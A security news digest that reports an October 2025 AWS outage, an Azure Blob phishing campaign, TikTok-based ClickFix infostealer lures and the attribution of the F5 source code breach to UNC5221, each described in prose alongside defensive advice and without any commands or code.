Significant AWS Outage Causes Widespread Internet Disruption Across Global Services
In the early hours of October 20, 2025, Amazon Web Services (AWS) experienced a severe outage affecting multiple regions, with the US-EAST-1 Region at the epicenter. The disruption triggered widespread downtime across major online platforms, including Amazon[.]com, Prime Video, Canva, Perplexity AI, Hulu, and several financial and AI-based applications. According to AWS, the root cause stemmed from a DNS resolution failure impacting the DynamoDB API endpoint, which cascaded into failures across interconnected services, including EC2, Lambda, RDS, and ECS. The outage began around 3:00 AM EST and rapidly expanded, causing elevated error rates, latency issues, and service timeouts. While AWS engineers immediately initiated mitigation efforts, users across North America and Europe reported being unable to access critical services or log into applications dependent on AWS authentication. As of 8:10 AM EST, AWS confirmed recovery progress, stating that SQS queues and Lambda Event Source Mappings were being processed, though significant backlogs remained. Engineers applied multiple layers of mitigation, stabilizing DNS resolution and restoring most impacted APIs, though EC2 launch operations in US-EAST-1 continued to experience intermittent failures. Services relying on Lambda’s polling mechanisms reported delayed execution times. This is a developing story, and AWS advised customers to flush DNS caches, retry failed requests, and ensure Auto Scaling Groups were configured across multiple availability zones to improve resilience. Despite recovery efforts showing “significant signs of stabilization,” AWS noted that throttling measures remained in effect while the infrastructure cleared queued workloads. The incident, one of the most extensive outages of 2025, has reignited discussions about cloud redundancy and single-provider risk, emphasizing the need for organizations to adopt multi-cloud architectures and proactive incident response planning to mitigate future service interruptions. This is a developing story.
New Phishing Attack Exploits Azure Blob Storage to Mimic Microsoft 365 Login Portals
A new phishing attack is exploiting Microsoft’s own Azure Blob Storage service to host fake Office 365 login pages, enabling threat actors to steal user credentials through highly convincing replicas of legitimate Microsoft sites. The attackers leverage trusted subdomains and SSL certificates signed by Microsoft, which lend their phishing portals an air of authenticity and allow them to bypass many automated security checks. Victims are lured through deceptive emails impersonating Microsoft Forms or document-sharing notifications, redirecting them to malicious URLs that masquerade as secure Microsoft sign-in pages hosted within Azure Blob containers. This technique exploits the inherent trust users and systems place in Microsoft infrastructure, allowing threat actors to stage convincing phishing attacks without triggering browser warnings. As a result, even cautious employees may unknowingly submit their credentials to a malicious endpoint. Once credentials are entered, they are exfiltrated to attacker-controlled servers, granting access to enterprise email, cloud storage, and authentication tokens that can be used for lateral movement and privilege escalation. The campaign demonstrates a growing trend in abusing legitimate cloud services for malicious hosting, effectively blurring the line between trusted and hostile infrastructure. Experts warn that blocking all traffic to all Azure blob subdomains while whitelisting trusted accounts can mitigate exposure. Additional safeguards include enforcing multi-factor authentication (MFA), monitoring login anomalies in Microsoft Entra ID, and implementing custom sign-in branding to help employees recognize genuine portals.
Update: TikTok Videos Used to Spread Info-Stealing Malware Through ClickFix Campaigns
Cybercriminals are exploiting TikTok’s viral platform to distribute infostealing malware disguised as “free activation” or “fix” tutorials for popular software, including Spotify, Netflix, Photoshop, Windows, and Microsoft 365. These short videos lure users into running malicious PowerShell commands, typically formatted as one-liners under the pretense of unlocking paid software for free. Once executed, the command retrieves a malicious PowerShell script that downloads secondary payloads, including Aura Stealer, which harvests browser credentials, cookies, cryptocurrency wallets, and other sensitive information. Persistence is maintained through scheduled tasks mimicking legitimate Windows processes, ensuring the malware launches at logon. Analysts have identified similar campaigns across multiple TikTok accounts, suggesting a coordinated operation designed to exploit the platform’s reach and user trust in creator content. Further investigation by the SANS Internet Storm Center revealed that the second-stage payload dynamically compiles and executes additional code in memory, a technique associated with self-compiling malware to evade detection. This approach allows attackers to inject shellcode directly into active processes while minimizing forensic traces. The campaigns leverage social engineering and user curiosity to bypass conventional defenses, emphasizing that TikTok has become a favored distribution vector for modern threat actors. Security experts advise users never to copy or run commands from online videos and to restrict PowerShell execution policies to administrative approval only. Organizations should deploy behavioral detection tools capable of identifying script-based threats and monitor for unusual task registrations or outbound connections to malicious domains. Enhanced awareness and proactive PowerShell monitoring remain essential to preventing these socially engineered infostealer infections.
Attribution Update: UNC5221 Confirmed Behind F5 Source Code Breach
Recent intelligence confirms that the year-long breach of F5 Networks was orchestrated by UNC5221, a China-linked espionage group specializing in long-term supply chain infiltration. The threat actor maintained persistence within F5’s internal development environment from August 2024 to mid-2025, exfiltrating portions of BIG-IP source code, undisclosed vulnerabilities, and proprietary development data. This theft provides the group with a technical blueprint to identify zero-days and craft highly tailored exploits against one of the world’s most widely deployed network technologies. UNC5221’s tactics mirror its previous campaigns against Ivanti, VMware, and other edge infrastructure vendors, relying on stealthy lateral movement, credential theft, and exploitation of management-plane interfaces. By targeting critical software suppliers, the group effectively bypasses traditional perimeter defenses, embedding long-term espionage capability deep within the digital supply chain. Following public disclosure, CISA issued an emergency directive mandating that all federal agencies patch or disconnect affected F5 systems by October 31, 2025. Forensic investigations revealed UNC5221’s use of the Brickstorm malware across EDR-blind infrastructure such as ESXi hypervisors and gateway appliances, enabling persistence without detection. Their operations align with Chinese state objectives to collect intelligence, maintain covert access to Western critical infrastructure, and erode confidence in trusted vendors. The group’s demonstrated capability to steal, analyze, and weaponize proprietary source code highlights the evolving threat posed by state actors in the software supply chain ecosystem. This attribution reinforces the urgency for continuous monitoring, stronger build-chain security, and multinational collaboration to deter state-sponsored exploitation of commercial technologies.
